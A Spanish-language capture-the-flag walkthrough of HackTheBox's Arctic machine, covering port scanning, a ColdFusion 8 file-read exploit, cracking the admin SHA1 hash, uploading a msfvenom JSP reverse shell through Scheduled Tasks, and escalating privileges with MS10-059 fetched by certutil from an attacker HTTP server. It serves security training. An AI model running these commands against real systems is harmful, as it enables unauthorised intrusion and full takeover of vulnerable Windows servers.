🟢Arctic

Write-up de la máquina Arctic de HackTheBox #writeup #walkthrough

Enumeración

NMAP

Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.

nmap -p- --open -vvv -Pn -n --min-rate 2000 10.10.10.11

Están abiertos los puertos 135, 8500 y 49154 TCP en la máquina objetivo. El siguiente paso es realizar un escaneo más profundo unicamente de los servicios abiertos.

nmap -p135,8500,49154 -sVC -vv -Pn -n 10.10.10.11

Tres servicios abiertos:

• Puerto 135 -> Microsoft Windows RPC

• Puerto 8500 -> ?

• Puerto 49154 -> Microsoft Windows RPC

Enumeración web

Vemos que el puerto 8500 está abierto, pero NMAP no muestra que se está ejecutando, así que vamos a verlo en un navegador web.

Tenemos un directorio abierto ejecutándose en el puerto 8500. Vamos a probar también otros directorios que puedan existir, para ello, inspeccionamos los directorios anteriores.

Después de inspeccionar todos los directorios, llegamos a un panel de administración de Adobe Coldfusion. Por un lado, vamos a analizar el código fuente y por otro, vamos a buscar exploits conocidos para ColdFusion 8.

Al ver el código fuente, podemos ver que hay un valor salt codificado que se agrega a la contraseña cuando se ingresa. Lo anotamos por si fuese interesante más adelante. Vamos a buscar exploits para esta versión.

searchploit coldfusion

Para descargar el exploit.

searchploit -m 14641.py

Abrimos el exploit.

Posible exploit LFI

Ejecutando el LFI en el navegador.

Y encontramos lo que parece ser un contraseña cifrada.

Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Vamos a descifrarla con hash-identifier y john-the-ripper.

hash-identifier 
john -w='/home/kali/rockyou.txt'  --format=raw-sha1 hash_password 

Obtenemos la contraseña "happyday"

Vamos a acceder al panel de admnistrador como usuario Admin utilizando la password anterior.

El siguiente paso será buscar puntos vulnerables dentro de este panel de administrador.

Shell como usuario Tolis

Hay multitud de enlaces que debemos revisar. Después de realizar la inspección, él único enlace que nos sirve es el servicio "Scheduled Tasks" en la sección "Debugging & Logging", que ofrece ColdFusion y nos permite cargar archivos.

Crearé un shell inverso con extensiónjspusando msfvenom para cargarlo en la máquina objetivo. ¿Por qué? ColdFusion está basado en Java y ejecuta archivos jsp.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.11 LPORT=8500 > securiters.jsp 

Esta shell creada la movemos al directorio /var/www/html/ para poder enviarla a la máquina objetivo mediante un servidor Web Apache.

cp securiters.jsp /var/www/html/

Primero vamos a buscar la ruta del path /CFIDE. Será necesario para subir la subir al objetivo.

El siguiente paso, cargar la shell en el objetivo. Para ello, iniciamos un servidor web Apache.

service apache2 start

Ahora vamos a programar una tarea en ColdFusion para que acceda al archivo securiters.jsp en nuestro servidor y poder cargar la shell. Agregaremos la URL de nuestro servidor donde está alojado el archivo securiters.jsp y también la ruta de destino para guardar el archivo en el objetivo, es decir, C:\ColdFusion8\wwwroot\CFIDE\securiters.jsp

Una vez programada la tarea, procedemos a ejecutarla.

Y volvemos al directorio /CFIDE, comprobando que se haya subido correctamente nuestra shell securiters.jsp.

Establecemos un oyente en nuestra máquina atacante.

nc -lvnp 8500

Y ya tendriamos shell como usuario tolis. Vamos a por la flag user.txt

Shell como usuario Administrator

Tenemos la siguiente información acerca de la máquina víctima.

Guardamos la información de systeminfo en un archivo txt, nos será útil en la siguiente fase.

Vamos a utilizar Windows-Exploit-Suggester para buscar posibles vulnerabilidades en el sistema de la máquina víctima. Vamos a instalar este script en nuestra máquina atacante.

git clone https://github.com/Riqky/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester 
sudo pip install xlrd --upgrade
./windows-exploit-suggester.py --update

Y ahora, ejecutamos este script con la base de datos actualizada que se ha creado y el archivo systeminfo que comentabamos anteriormente.

./windows-exploit-suggester.py --database 2022-11-03-mssb.xlsx --systeminfo '/home/kali/Desktop/HackTheBox/arctic/systeminfo.txt'

Una vez ejecutado el comando anterior, obtenemos las siguientes vulnerabilidades en la máquina víctima.

Vamos a utilizar la vulnerabilidad MS10-059 para intentar obtener acceso como administrador a la máquina víctima. Descargamos el exploit y lo subimos a la máquina víctima haciendo uso de un servidor Python HTTP.

python3 -m http.server 8080
certutil.exe -urlcache -f http://10.10.16.11:8080/MS10-059.exe c.exe (en la máquina víctima)

Ejecutamos el exploit en la máquina víctima, y al mismo tiempo colocamos un oyente en nuestra máquina.

rlwrap nc -lnvp 8000
c.exe 10.10.16.11 8000 (en la máquina víctima, en el directorio donde se haya colocado el exploit)

Una vez ejecutado el exploit, tendriamos privilegios máximos en la máquina objetivo. El siguiente psao será buscar la flag root para finalizar este CTF.

Flago root.txt

Y ya estaría acabado este CTF.